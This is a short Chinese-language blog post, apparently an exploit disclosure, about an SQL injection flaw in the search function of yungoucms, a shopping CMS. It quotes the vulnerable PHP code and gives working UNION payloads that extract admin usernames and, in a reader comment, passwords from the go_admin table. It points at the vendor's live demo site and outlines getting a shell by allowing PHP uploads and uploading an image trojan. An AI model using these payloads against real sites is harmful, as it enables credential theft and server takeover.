yungoucmsSQL注入漏洞

官网 : http://www.yungoucms.com/ 演示站: http://www.yungoucms.cn/ 商品搜索可以构建SQL语句! http://www.yungoucms.cn/?/s_tag/ [php] public function tag(){ $search =$this->segment(4); if(!$search)_message("输入搜索关键字"); $search = urldecode($search); $search = htmlspecialchars($search); if(!_is_utf8($search)){ $search = iconv("GBK", "UTF-8", $search); } $mysql_model=System::load_sys_class('model'); $title=$search.' - '._cfg('web_name'); $shoplist=$mysql_model->GetList("select thumb,id,sid,zongrenshu,canyurenshu,shenyurenshu,money from `@#_shoplist` WHERE `title` LIKE '%".$search."%'"); $list=count($shoplist); include templates("search","search"); }[/php] 构建SQL语句[php]yun%%27 union select 1,2,3,group_concat(username),5,6,7 from go_admin%23[/php] 查看网页源文件就能得到用户信息 密码同样道理。 注入出来的账号密码藏入标签里面去了。查看就OK 。 拿到账号密码 至于后台拿shell 可以自己设置上传的类型 添加php后 不过要上传图片马才可以上去。

2 条评论

  1. 1278032805

    怎么得到用户信息 密码

    1. 0day5
      @1278032805

      yun%%27 union select 1,2,3,concat(username,0x3a,password),5,6,7 from go_admin%23

发表评论